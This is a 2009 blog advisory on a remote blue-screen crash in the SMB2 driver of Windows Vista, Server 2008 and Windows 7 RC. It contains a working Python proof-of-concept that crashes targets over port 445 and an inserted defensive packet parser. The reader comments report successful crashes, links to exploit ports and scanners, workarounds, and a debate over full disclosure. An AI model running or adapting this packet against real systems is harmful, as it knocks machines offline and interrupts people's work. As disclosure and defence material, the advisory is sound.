Monday, September 7, 2009

[Updated] Windows Vista/7: SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=============================================

I. VULNERABILITY
-------------------------
Windows Vista, Server 2008 < R2, 7 RC:
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-------------------------
Windows Vista and newer versions of Windows come with a new SMB version named SMB2.
See: http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-------------------------
[Edit] Unfortunately this SMB2 security issue is specifically due to an MS patch for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 creates the following issue:

SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it is used to identify the SMB dialect that will be used for further communication.

IV. PROOF OF CONCEPT
-------------------------

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
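A defender-side check, added here as an example and not part of the original advisory: it parses a NetBIOS-framed SMB1 NEGOTIATE PROTOCOL REQUEST laid out like the PoC above, lists the dialects the client offers, and flags a non-zero Process ID High field so that such requests can be spotted in captured traffic. The two sample frames are constructed inside the block (they are not captured packets); the field names follow the SMB1 header layout.

```python
import struct

SMB_COM_NEGOTIATE = 0x72      # command byte of a NEGOTIATE request
SMB_HEADER_LEN = 32           # fixed SMB1 header size
# Little-endian SMB1 header: Protocol, Command, Status, Flags, Flags2,
# PIDHigh, SecurityFeatures, Reserved, TID, PIDLow, UID, MID
SMB_HEADER_FMT = "<4sBIBHH8sHHHHH"


def parse_smb1_negotiate(frame: bytes) -> dict:
    """Parse a NetBIOS session message carrying an SMB1 NEGOTIATE request.
    Returns header fields plus dialect strings; raises ValueError otherwise."""
    if len(frame) < 4 + SMB_HEADER_LEN + 3:
        raise ValueError("frame too short for NetBIOS + SMB header")
    nb_type, nb_len = frame[0], int.from_bytes(frame[1:4], "big")
    if nb_type != 0x00 or nb_len != len(frame) - 4:
        raise ValueError("bad NetBIOS session header")
    smb = frame[4:]
    (proto, command, status, flags, flags2, pid_high, _sig, _reserved,
     tid, pid_low, uid, mid) = struct.unpack(SMB_HEADER_FMT, smb[:SMB_HEADER_LEN])
    if proto != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    if command != SMB_COM_NEGOTIATE:
        raise ValueError("command 0x%02x is not NEGOTIATE" % command)
    word_count = smb[SMB_HEADER_LEN]             # a NEGOTIATE request carries 0 words
    bc_off = SMB_HEADER_LEN + 1 + 2 * word_count
    byte_count = struct.unpack_from("<H", smb, bc_off)[0]
    data = smb[bc_off + 2:bc_off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the end of the frame")
    dialects = []
    for entry in data.split(b"\x00"):
        if not entry:
            continue
        if entry[0] != 0x02:                     # each dialect starts with BufferFormat 0x02
            raise ValueError("dialect entry without 0x02 buffer-format byte")
        dialects.append(entry[1:].decode("ascii", "replace"))
    return {"status": status, "flags": flags, "flags2": flags2, "pid_high": pid_high,
            "tid": tid, "pid_low": pid_low, "uid": uid, "mid": mid, "dialects": dialects}


def negotiate_findings(frame: bytes) -> list:
    """Describe what is unusual about a negotiate request; empty list means it looks normal."""
    req = parse_smb1_negotiate(frame)
    findings = []
    if req["pid_high"] != 0:
        findings.append("non-zero Process ID High 0x%04x in NEGOTIATE request" % req["pid_high"])
        if any(d.startswith("SMB 2.") for d in req["dialects"]):
            findings.append("request also offers an SMB2 dialect, so it reaches the SMB2 negotiate path")
    return findings


# Constructed fixtures (not captured traffic): same layout and dialect list as the PoC above.
_DIALECTS = [b"PC NETWORK PROGRAM 1.0", b"LANMAN1.0", b"Windows for Workgroups 3.1a",
             b"LM1.2X002", b"LANMAN2.1", b"NT LM 0.12", b"SMB 2.002"]
_DATA = b"".join(b"\x02" + d + b"\x00" for d in _DIALECTS)   # 109 bytes of dialect entries


def _sample_frame(pid_high: int) -> bytes:
    header = struct.pack(SMB_HEADER_FMT, b"\xffSMB", SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                         pid_high, b"\x00" * 8, 0, 0xFFFF, 0xFEFF, 0, 0)
    smb = header + b"\x00" + struct.pack("<H", len(_DATA)) + _DATA   # WordCount=0, ByteCount
    return b"\x00" + len(smb).to_bytes(3, "big") + smb                # NetBIOS session message


NORMAL_REQUEST = _sample_frame(0x0000)
MALFORMED_REQUEST = _sample_frame(0x2600)   # bytes 00 26: the "&" the PoC places in PIDHigh

if __name__ == "__main__":
    for name, frame in (("normal", NORMAL_REQUEST), ("malformed", MALFORMED_REQUEST)):
        print(name, parse_smb1_negotiate(frame)["dialects"][-1], negotiate_findings(frame))
```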

V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled.
Windows XP and 2000 are NOT affected, as they do not have this driver.

VI. SYSTEMS AFFECTED
-------------------------
[Edit] Windows Vista All (64b/32b | SP1/SP2 fully updated), Win Server 2008 < R2, Windows 7 RC.

VII. SOLUTION
-------------------------
No patch is available for the moment.
Close the SMB feature and ports until a patch is provided.
Configure your firewall properly.
You can also follow the MS workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
-------------------------
http://www.microsoft.com/technet/security/advisory/975497.mspx
http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
Many people have suggested updating this advisory to RCE rather than BSOD.
It won't be done: if they find a way to execute code, they can publish their own advisory.

120 comments:

  1. If this vuln is real, why didn't you report it to Microsoft MSRC?
    Because it looks really stupid to publish this kind of thing on Full Disclosure.

  2. "Anonymous said...
    If this vuln is real. Why didnt you reported it to Microsoft MSRC?
    Because it looks really stupid to publish this kind of thing on Full disclosure."

    He may have months ago. Security through obscurity. If there's an inherent problem, it's important for anyone to allow end-users to make an informed decision about the risks involved. In short, MS need to jump on this with both feet rather than dawdle, as is their usual response.

  3. Anonymous said...
    If this vuln is real. Why didnt you reported it to Microsoft MSRC?
    Because it looks really stupid to publish this kind of thing on Full disclosure.

    VII. SOLUTION
    -------------------------
    Vendor contacted, but no patch available for the moment.
    Close SMB feature and ports, until a patch is provided.

    Perhaps read the text rather than voice opinions from an undeserved soap-box.

  4. @Anonymous:

    I have tried this exploit myself on a Windows 7 machine and it didn't work. Perhaps the code itself isn't the actual exploit, but an example of what it is/could be.

    I tried this code from a Mac and from a backtrack image... neither caused the remote Windows 7 machine to BSOD. SMB was turned on and worked normally otherwise (as expected).

  5. @zach, on windows7/vista you need to enable file sharing in your network connection center.

  6. Has it been tested with an IDS / firewall or that kind of software?

  7. Tested against Windows7 x64, it does not work.

  8. @Anonymous:
    "Because it looks really stupid to publish this kind of thing on Full disclosure."

    Not more stupid than not submitting this new code to a normal S.Q.A. routine before shipping that product on any P.C. by default.

  9. @Marcos Orallo
    enable file sharing;
    it works.

  10. Seems to work on 32 bit Vista, result: http://m.blog.hu/bu/buhera/image/vista_smbv2.png

  11. Works also against Windows 2008 Server.

  12. Laurent, this is a remote code execution vulnerability, not merely a DoS.

    http://www.reversemode.com/index.php?option=com_mamblog&Itemid=15&task=show&action=view&id=64&Itemid=15

  13. So you see Ruben says it works like a charm ...

  14. Now, let's see what Microsoft will decide...

  15. yeah Laurent, nice find btw.

  16. Omg, Laurent, you'd better place some mistakes in the PoC to prevent some kiddies from using it on a LAN.

  17. I think it's great Laurent Gaffié disclosed it! Good work I bet you're using Linux at home just like me! Keep up the good work! Full Disclosure FTW!

    I've made a Metasploit port of your PoC (giving you credit, of course):
    http://pastie.org/609407

    ~ MaXe

  19. What release of Windows 7 did you use?
    I'm running the script on a Debian box against a Windows 7 Ultimate 64-bit and a 32-bit (both are 7600) and it didn't work.
    I have file sharing enabled; I can access both computers' resources from a Windows XP machine without any problem (and I'm not even asked for a user/password, as I have it configured not to ask for user/pass, if that matters).

  20. Oh, and I don't have any firewall running (Windows firewall is disabled) or any antivirus software.

  21. 1. Disable windows firewall
    2. Enable file sharing
    3. Run exploit
    4. Have Fun

  22. Thanks.
    But how do you close the SMB feature and ports in Vista, please?

  23. Excellent, 2008 puked... and now AD won't start.

  24. You ran this code against your domain controller? Nice.

  25. Add to that list, bro... Windows 2008 with SP2!!!!!

  26. It was a DC on VBOX. Was supposed to use it for a security seminar... LOLZ...

  27. Does NOT work against the final release of Windows 7 Enterprise in a domain environment, with firewall off and file sharing on. Doesn't work with firewall on and sharing off either :)

    Does work against fully updated Vista Enterprise.

  28. Yup, does not work on 7 RTM build 7600 (without domain membership) either. Anyone tried on 2008 R2?

  29. Full compatibility with w2k8 r2.

    Check your firewall configuration!

    www.aboo.pl

  30. How in the world did you even discover this?

  31. No effect on Win7 Pro x64, file sharing enabled, verified via Wireshark (packet arrives and a response to the packet is sent).

  32. New?

    http://social.answers.microsoft.com/Forums/en-US/vistahardware/thread/3bdd46f8-d47d-4a67-930d-48bc9a18b2c7

    http://support.microsoft.com/search/default.aspx?catalog=LCID%3D1033&query=DRIVER_POWER_STATE_FAILURE&mode=r

  33. Added to Metasploit: http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/dos/windows/smb/smb2_negotiate_pidhigh.rb :)

  34. When will remote code execution be added?

  35. Alright, publishing this was a very jerk move on Laurent's part.

    He received a reply saying that no patch was available along with a workaround and he decided to post the exploit live anyway instead of waiting until it was fixed? Could a person be any more of a jerk? Microsoft takes all SMB vulnerabilities seriously, but instead of doing everyone a favor and just waiting until a patch were to be released, you decided to open it up to a realm of script kiddies bored at school/work who'll try to inflict as much damage as possible.

    Sad.

  36. Bryant, that means that Microsoft will ACTUALLY patch it in a timely manner. It may be a jerk move against Microsoft but it is better for everybody else.

  37. I disagree with Bryant and sympathizers.

    After giving MS ample time to rectify the problem it is imperative that the information and work around be disclosed far and wide. MS was notified, failed to promptly release a patch, so the matter is now in the hands of the public domain to manage.

    If you had properly firewalled your ports in the first place, the exploit would be a non-issue.

    Am I the only one who tires of the post-exploit-publication QQ?

  38. Tried with no results on Vista Ultimate 32-bit. nmap shows 445 open, packet captured with Wireshark, but no effect.

  39. Good report if it was just a DoS; however, god knows how many days of work this is going to cause admins due to remote code execution.

    All in the name of security, heh.

  40. Disable SMB 2.0 and the exploit doesn't work anymore:

    http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm

  41. Looks like the good old winnuke is back. http://rapidshare.com/files/277352935/WinnukeV7.zip.html

  42. Windows 7 is immune to this vulnerability.

  43. If you run ESET's NOD32 AV, its firewall filters the ports in such a way that you can't run the exploit.

  44. Works like a charm, tested on Vista Home Premium 32-bit (also works through Norton 360 2009, in a [SHARED] "default" local network).

  45. Windows 7 RTM and Server 2008 R2 RTM are not vulnerable to this exploit. 7/2008 R2 RC are, as are Vista/2008. (Grouped by kernel family).

    It would be nice if they'd backport whatever they fixed in RTM to Vista, but as far as running Windows 7 / R2 beta versions, I don't sympathize.

    As far as vulnerability reporting goes, it's not really accurate to say that this bug impacts Windows 7 if you haven't tested the RTM. If you are running RC code, you get what you pay for.

  46. Releasing this allows people to protect themselves before there's a patch. You're assuming that only HE has found the exploit, a white-hat with good intentions. You think other people who might have found this are going to be so nice?

  47. I'm having trouble getting it to work, but that could just be because it's complaining about bad headers in the crafted packet (it's been a while since I've done this..). Testing it out against Win7 32 and 64 at home.. hope to have results soon. Wireshark capture shows the packet is received by the remote computer and responded to, but no BSOD. The problem seems to be in the header checksum.

  48. What I can't believe is that a bug in the file sharing part of the operating system can crash the whole thing... who writes these things?

  49. Windows 7 is not affected. The affected version was Windows 7 RC, not the full official release.

    http://www.microsoft.com/technet/security/advisory/975497.mspx

  50. @Anonymous (above my post)

    That's exactly why I agree fully with full disclosure.

    I imagine a group of blackhats getting angry because yet another hidden 0day was disclosed :-P So I don't think people should get angry at Laurent; I'd do the same, willingly knowing that some script kiddies, worm makers and such would abuse it as well. But that's just the yin and yang principle.

    HDM has by the way also added another module to the Metasploit framework which exploits another bug in the negotiate protocol / smb service.

  51. Sorry I caught this a little late; should have expected something like this.

    Thanks for the B-day prez .. HIGH: --> :-)

  52. To any of you complaining about disclosure... you're lucky this isn't weaponized and already wormed.

    It's funny how after what, 200 million dollars+ and 7 years, all it takes is 1 guy with enough brain power and that special kind of addiction to poke a hole in anything!

    Cheers on the great find

  53. Great...

    It works against Windows 2008 but not Windows 7.

    I'm checking the Microsoft Tuesday Updates and there's nothing related.

    Sniper

  54. Putting this kind of info out publicly on the Monday before patch day shows malice.

    Not disclosing responsibly is also bad faith.

    Attention-seeking misfit?

  55. Cool.. good finding! Hope all security vendors have covered this kind of vulnerability instead of waiting for the Microsoft patch.

  56. nice find laurent!
    congraz!!

    full-disclosure for life!!

  57. Microsoft released advisory 975497 today saying that Win7 RTM and Win2008 R2 RTM are not vulnerable.

  58. C sources (if somebody needs): http://pastie.org/610829
    Thanks for great work, Laurent!

  59. Does this remote exploit affect Vista even if the firewall (which is on by default) is running?

  60. "yes" ^^^^

    From reading up on this, the exploit doesn't work if Vista's firewall is set to 'Public' mode.

  61. Winsock C source :)
    http://pastie.org/611098

  62. Windows users make me laugh.

    Seriously, any serious vendor would have contacted the guy begging him not to disclose anything till a patch was released. But since this is M$...

    Tough for them. If they start treating security like a real issue, maybe I'll start using them.

  63. The fix is disabling SMB2 via the registry and rebooting. This can be deployed through group policy.

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]
    "SMB2"=dword:00000000

  64. http://rapidshare.com/files/277781832/SMB2-TEST-FLAW-EDUCATIONAL.rar.html

    I found an app that exploits this vulnerability, but it needs .NET.

  65. This has been tested and works great.. here at my work we made a quick PHP script to send the malformed SMB packet to incoming systems.. every time a Vista user visits the page their machine BSODs. :)

    I have tested this and verified it works on:
    Vista x32 -- All versions
    Vista x64 -- All versions
    Windows 7 -- Release candidates (NOT RTM)
    Windows Server 2008, pre RC2

    Any machine above with 445 open and SMB (enabled by default) is affected.

    Great job on the full disclosure!

  66. Alexander: You have way too much time on your hands...

    Laurent: Excellent find!

  67. It was only a matter of time before a zero day was discovered; how long will it be before Microsoft patches this bug?

  68. I am developing a multithreaded scanner for class B, C... etc. networks in Python. I hope it's useful. It's in Spanish, but it's very easy to translate.

    http://blogricardo.wordpress.com/2009/09/09/escaner-exploit-para-windows-vista-2008/

  69. With all respect to Laurent and other commenters, the importance of not disclosing this kind of thing is this: even with a disclosure, a lot of good people won't know of it.
    Instead, a lot of non-capable attackers now might have a method to harm that they would never have discovered on their own.
    Microsoft will develop a solution, release a patch, and still a lot of customers will be vulnerable months later. (cont.)

  70. (cont.) Making Microsoft's face red does not help anyone. While you have the right to tire of post-exploit patching, experience demonstrates that patching accelerates exploiting, and makes it broader.
    Those who have a good IT management practice will probably not be vulnerable with or without a patch. Those who are vulnerable now are only exposed to a greater risk.

  71. http://www.caughq.org/advisories/disclosure.html

  72. Yes, that sounds beautiful. But an available patch does not make a patched system.

  73. Nice finding..
    Tested and works like a charm, but not for Win7 RTM.

    Just disable file & printer sharing for now until the patch is released, and block port 445 as well.

    Why leave this service enabled when you don't rely on it?

    hail macs.. lulz

  74. My tests confirmed that this security issue is NOT Service Pack related, and was introduced by the KB942624 (MS07-063) patch in December 2007.

  75. One news outlet reported that Laurent submitted the bug to Microsoft, but there was a typo in the e-mail address.

    Mistakes happen, but a little extra effort to contact the vendor could have been made. I know that Microsoft has forms, forums, and telephone numbers. Not saying you got to contact them all, but a single e-mail does not due diligence make.

    If there was no response after several attempts over several days, then a public disclosure is warranted.

  76. You didn't submit the bug to the editor (or with a typo in the address; are you not able to type an address, or was it on purpose?), you posted a proof of concept on patch day, when MS has no time to fix the hole before next month. It looks like you did everything on purpose.
    It would be funny for MS if nobody would use their software for important things. Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow.

    Laurent, you're an asshole.

  77. Hey not so "Anonymous",

    Regarding my disclosure with MS, that's my choice, and I still think that in this specific case it was a good idea; you'll see why.

    However, concerning the typo, I sent the advisory (only to advise them) to microssoft.com; shit happens.

    Full-Disclosure is useful in such a case because:

    Anyone (including MS) who would have tested this critical component would have found this bug in a matter of seconds.

    It showed this specific bug (my payload) was introduced by a security patch (MS07-063), showing us no S.Q.A. and security testing
    has been done on it before shipping it on any P.C.
    Even worse: an official Microsoft spokesman told Robert Lemos:
    "We found this issue independently through our fuzzing processes and implemented the fix into Windows 7 RTM (release to manufacturer)
    and Windows Server 2008 R2," see: http://www.technologyreview.com/blog/unsafebits/24105/?a=f

    This means they knew about this issue but failed at protecting their customers.
    Now that I published the remote teardrop advisory, they use the words "irresponsible disclosure" while patching in an emergency what they
    have known for a long time.
    This is a serious error; as the bug was very easy to find, it was only a matter of time before someone disclosed it...

  78. Laurent Gaffie,

    Great research and discovery. Also, great that you have disclosed it, so the developers have to work on it.

  79. A working exploit has been made commercially available by Immunity Inc. (see securityfocus.org for a link).

    A shame that it is only commercially available, because I'd like to see how it abuses the 16 bits :-) Anyone care to share at least some sort of information?

  80. It is also here: http://thepiratebay.org/torrent/5083672/Windows_Vista_7_SMB2.0_NEGOTIATE_PROTOCOL_Remote_BSOD_Tool

  81. Hello guys,
    I have a file server (Windows Server 2008), but when I disable SMB2 it disconnects all the mapped drives of my clients (on the local network). Do you know how to disable SMB2 without interrupting mapped drives (file sharing)?
    Thanks in advance.

  82. I have got the solution. Need to uncheck the default file and printer sharing rule in the firewall and allow ports 139 and 445 from the IP subnet.

  83. "It would be funny for MS if nobody would use their software for important things. Today I saw a girl in my college who was weeping: she lost all her work because of script kiddies who reboot all the computers. Her exam is tomorrow."

    If people used OSes that deserve the name, that wouldn't happen.

  84. What VULNERABILITY is it exactly about? A shame that it is only commercially available. Anyone care to share at least some sort of information?

  86. So I suppose it's fixed now that it was in Windows 7 RC release?

  87. guys,

    That's Microsoft's fault... Laurent only posted the PoC for the BSoD, not a working RCE exploit, ok?

    So you are the jerk, Bryant! 'cause you use Windows ;-)

  90. Tried running the script on my Windows 7 virtual machine. Packets were being sent and received (as seen in Wireshark); however, Windows 7 did not crash. Has the patch been made in the recent releases of Windows 7? I had downloaded my present copy from MSDNAA a week back...

  93. Nice article. They are lucky it was you who discovered this and not someone with more sinister goals.

  98. He didn't report it to M$ because he's not a Microsoft fanboy like most commenters here.

  99. I have had so many problems with Vista that I have already given up and moved on. Windows 7 is cool so far.

  105. Works on Windows Server 2008 Standard SP1.
